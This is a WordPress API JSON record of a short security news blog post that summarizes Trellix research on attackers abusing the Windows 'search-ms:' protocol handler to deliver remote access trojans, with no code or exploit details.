{"id":168722,"date":"2023-07-31T04:23:20","date_gmt":"2023-07-31T09:23:20","guid":{"rendered":"https:\/\/lifeboat.com\/blog\/2023\/07\/hackers-abusing-windows-search-feature-to-install-remote-access-trojans"},"modified":"2023-07-31T04:23:20","modified_gmt":"2023-07-31T09:23:20","slug":"hackers-abusing-windows-search-feature-to-install-remote-access-trojans","status":"publish","type":"post","link":"https:\/\/lifeboat.com\/blog\/2023\/07\/hackers-abusing-windows-search-feature-to-install-remote-access-trojans","title":{"rendered":"Hackers Abusing Windows Search Feature to Install Remote Access Trojans"},"content":{"rendered":"<p><a class=\"aligncenter blog-photo\" href=\"https:\/\/lifeboat.com\/blog.images\/hackers-abusing-windows-search-feature-to-install-remote-access-trojans2.jpg\"><\/a><\/p>\n<p>A legitimate Windows search feature is being exploited by unknown malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT.<\/p>\n<p>The novel attack technique, per Trellix, takes advantage of the \u201c<a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/search\/getting-started-with-parameter-value-arguments\" rel=\"noopener\" target=\"_blank\">search-ms:<\/a>\u201d URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the \u201c<a href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/desktop\/legacy\/cc144083(v=vs.85)\" rel=\"noopener\" target=\"_blank\">search:<\/a>\u201d application protocol, a mechanism for calling the desktop search application on Windows.<\/p>\n<p>\u201cAttackers are directing users to websites that exploit the \u2018search-ms\u2019 functionality using JavaScript hosted on the page,\u201d security researchers Mathanraj Thangaraju and Sijo Jacob <a href=\"https:\/\/www.trellix.com\/en-us\/about\/newsroom\/stories\/research\/beyond-file-search-a-novel-method.html\" rel=\"noopener\" target=\"_blank\">said<\/a> in a Thursday write-up. \u201cThis technique has even been extended to HTML attachments, expanding the attack surface.\u201d<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A legitimate Windows search feature is being exploited by unknown malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The novel attack technique, per Trellix, takes advantage of the \u201csearch-ms:\u201d URI protocol handler, which offers the ability for applications and HTML [\u2026]<\/p>\n","protected":false},"author":427,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1492],"tags":[],"class_list":["post-168722","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/posts\/168722","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/users\/427"}],"replies":[{"embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/comments?post=168722"}],"version-history":[{"count":0,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/posts\/168722\/revisions"}],"wp:attachment":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/media?parent=168722"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/categories?post=168722"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/tags?post=168722"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}